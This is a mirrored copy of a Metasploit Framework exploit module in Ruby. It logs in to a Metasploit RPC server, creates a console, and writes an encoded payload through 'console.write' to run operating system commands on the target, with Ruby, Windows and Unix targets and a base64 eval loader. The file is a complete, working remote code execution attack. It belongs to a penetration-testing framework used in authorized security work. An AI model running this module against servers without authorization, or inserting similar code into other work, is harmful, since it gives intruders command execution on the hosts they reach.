Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/misc/msf_rpc_console.rb
31851 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Metasploit RPC Console Command Execution',

16
        'Description' => %q{

17
          This module connects to a specified Metasploit RPC server and

18
          uses the 'console.write' procedure to execute operating

19
          system commands. Valid credentials are required to access the

20
          RPC interface.

21


22
          This module has been tested successfully on Metasploit 4.15

23
          on Kali 1.0.6; Metasploit 4.14 on Kali 2017.1; and Metasploit

24
          4.14 on Windows 7 SP1.

25
        },

26
        'License' => MSF_LICENSE,

27
        'Author' => 'bcoles',

28
        'References' => [

29
          [ 'URL', 'https://help.rapid7.com/metasploit/Content/api/rpc/overview.html' ],

30
          [ 'URL', 'https://community.rapid7.com/docs/DOC-1516' ]

31
        ],

32
        'Targets' => [

33
          [

34
            'Ruby', {

35
              'Arch' => ARCH_RUBY,

36
              'Platform' => 'ruby',

37
              'Payload' => { 'BadChars' => "\x00" }

38
            }

39
          ],

40
          [

41
            'Windows CMD', {

42
              'Arch' => ARCH_CMD,

43
              'Platform' => 'win',

44
              'Payload' => { 'BadChars' => "\x00\x0A\x0D" }

45
            }

46
          ],

47
          [

48
            'Unix CMD', {

49
              'Arch' => ARCH_CMD,

50
              'Platform' => 'unix',

51
              'Payload' => { 'BadChars' => "\x00\x0A\x0D" }

52
            }

53
          ]

54
        ],

55
        'DefaultOptions' => { 'PrependFork' => true, 'WfsDelay' => 15 },

56
        'Privileged' => false,

57
        'DisclosureDate' => '2011-05-22',

58
        'DefaultTarget' => 0,

59
        'Notes' => {

60
          'Reliability' => UNKNOWN_RELIABILITY,

61
          'Stability' => UNKNOWN_STABILITY,

62
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

63
        }

64
      )

65
    )

66
    register_options [

67
      Opt::RPORT(55552),

68
      OptString.new('USERNAME', [true, 'Username for Metasploit RPC', 'msf']),

69
      OptString.new('PASSWORD', [true, 'Password for the specified username', '']),

70
      OptBool.new('SSL', [ true, 'Use SSL', true])

71
    ]

72
  end

73


74
  def execute_command(cmd, _opts = {})

75
    res = @rpc.call 'console.write', @console_id, "\r\n#{cmd}\r\n"

76


77
    if res.nil?

78
      fail_with Failure::Unknown, 'Connection failed'

79
    end

80


81
    unless res['wrote'].to_s =~ /\A\d+\z/

82
      print_error "Could not write to console #{@console_id}:"

83
      print_line res.to_s

84
      return

85
    end

86


87
    vprint_good "Wrote #{res['wrote']} bytes to console"

88
  end

89


90
  def exploit

91
    begin

92
      @rpc = Msf::RPC::Client.new host: rhost, port: rport, ssl: ssl

93
    rescue Rex::ConnectionRefused

94
      fail_with Failure::Unreachable, 'Connection refused'

95
    rescue StandardError => e

96
      fail_with Failure::Unknown, "Connection failed: #{e}"

97
    end

98


99
    res = @rpc.login datastore['USERNAME'], datastore['PASSWORD']

100


101
    if @rpc.token.nil?

102
      fail_with Failure::NoAccess, 'Authentication failed'

103
    end

104


105
    print_good 'Authenticated successfully'

106
    vprint_status "Received temporary token: #{@rpc.token}"

107


108
    version = @rpc.call 'core.version'

109


110
    if res.nil?

111
      fail_with Failure::Unknown, 'Connection failed'

112
    end

113


114
    print_status "Metasploit #{version['version']}"

115
    print_status "Ruby #{version['ruby']}"

116
    print_status "API version #{version['api']}"

117


118
    vprint_status 'Creating new console...'

119
    res = @rpc.call 'console.create'

120


121
    if res.nil?

122
      fail_with Failure::Unknown, 'Connection failed'

123
    end

124


125
    unless res['id'].to_s =~ /\A\d+\z/

126
      print_error 'Could not create console:'

127
      print_line res.to_s

128
      return

129
    end

130


131
    @console_id = res['id']

132
    print_good "Created console ##{@console_id}"

133


134
    print_status 'Sending payload...'

135


136
    case target['Platform']

137
    when 'ruby'

138
      cmd = "ruby -e 'eval(%[#{Rex::Text.encode_base64(payload.encoded)}].unpack(%[m0]).first)'"

139
    when 'win'

140
      cmd = payload.encoded

141
    when 'unix'

142
      cmd = payload.encoded

143
    else

144
      fail_with Failure::NoTarget, 'Invalid target'

145
    end

146


147
    execute_command cmd

148
  end

149


150
  def cleanup

151
    return if @console_id.nil?

152


153
    vprint_status 'Removing console...'

154
    res = @rpc.call 'console.destroy', @console_id

155


156
    if res.nil?

157
      print_error 'Connection failed'

158
      return

159
    end

160


161
    unless res['result'].eql? 'success'

162
      print_warning "Could not destroy console ##{@console_id}:"

163
      print_line res.to_s

164
      return

165
    end

166


167
    vprint_good "Destroyed console ##{@console_id}"

168
  ensure

169
    @rpc.close

170
  end

171
end

172


173